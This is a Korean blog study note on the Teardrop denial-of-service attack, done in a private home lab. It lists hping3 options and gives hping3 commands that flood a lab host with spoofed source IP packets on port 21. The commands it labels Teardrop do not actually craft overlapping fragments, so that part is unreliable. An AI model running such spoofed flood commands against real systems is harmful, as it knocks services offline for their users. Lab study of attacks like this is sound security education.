안녕하세요~ 지방토끼입니다.
오늘은 네트워크 보안 DoS-Teardrop(눈물방울 공격)에 대해서 공부해 보려고 합니다!
그럼 시작해 볼까요?
Kali IP : 192.168.15.100
Linux IP : 192.168.15.101
Windows IP : 192.168.15.102
DoS
- 서비스 거부 공격
- 자원을 고갈시키는 공격
(공격)
- Network : 대역폭 고갈
- System : CPU, Memory, Disk, Process 자원 고갈
(명령어)
# hping3 [옵션] [공격 대상]
(옵션)
-c : 패킷 수 지정
-d : 데이터 크기
--flood : 최고의 속도로 최대 생성
--fast : 초당 10 패킷
--faster : 초당 100 패킷
(IP 옵션)
-a : 출발지 IP 주소 변조
--rand-dest : 랜덤 목적지 IP 주소 변조
--rand-source : 랜덤 출발지 IP 주소 변조
(UDP/TCP 옵션)
-s : 출발지 포트 지정
-p : 목적지 포트 지정
-S : SYN flag
-F : FIN flag
-P : PSH flag
-A : ACK flag
-R : RST flag
-U : URG flag
-X : X-mas flag (0x40)
-M : TCP Sequence number
(모드 옵션)
기본값 : TCP 모드
-0 : IP 모드
-1 : ICMP 모드
-2 : UDP 모드
-8 : Scan 모드
Teardrop(눈물방울 공격)
- 패킷 크기 일정 크기(MTU) 보다 작게 생성해서 전송(공격), ID/Offset/순서번호 조작
- 공격대상 컴퓨터에 헤더가 조작된 일련의 IP 패킷 조각(IP Fragments)을 전송함으로써, 서비스 속도를 느리게
하거나, 마비시키는 공격 기법
- 조작 : ID, Sequence number, Offset
1. Teardrop 공격(kali)
# hping3 -a 100.100.100.100 192.168.15.101 --id 2222 -M 3333 -p 21 --flood
- 출발지 IP주소 100.100.100.100 변조, id 2222, Sequence number 3333, 목적지 포트 21,
최고의 속도로 최대 생성
2. wireshar & 시스템 정보 확인(Linux)
# wireshark &
# gnome-system-monitor
3. Teardrop 공격(kali)
# hping3 -a 100.100.100.100 192.168.15.101 --id 2222 –M 3333 –d 320 –p 21 --flood
- 출발지 IP주소 100.100.100.100 변조, id 2222, Sequence number 3333, 데이터 크기 320, 목적지 포트 21,
최고의 속도로 최대 생성
4. wireshar & 시스템 정보 확인(Linux)
# wireshark &
# gnome-system-monitor
.
.
.
.
.
.
오늘은 네트워크 보안 DoS-Teardrop(눈물방울 공격)에 대해서 공부해 보았습니다.!
읽어주셔서 감사합니다!
나쁜 용도로 쓰시면 안돼요!!
틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!
'네트워크 보안' 카테고리의 다른 글
네트워크 보안 - DoS-Land (0) | 2024.01.12 |
---|---|
네트워크 보안 - DoS-Smurf(ICMP Flooding) (0) | 2024.01.12 |
네트워크 보안 - DoS-Ping of Death(죽음의 핑) (0) | 2023.12.19 |
네트워크 보안 - DoS-UDP Flooding (1) | 2023.12.19 |
네트워크 보안 - DoS-SYN Flooding (0) | 2023.12.19 |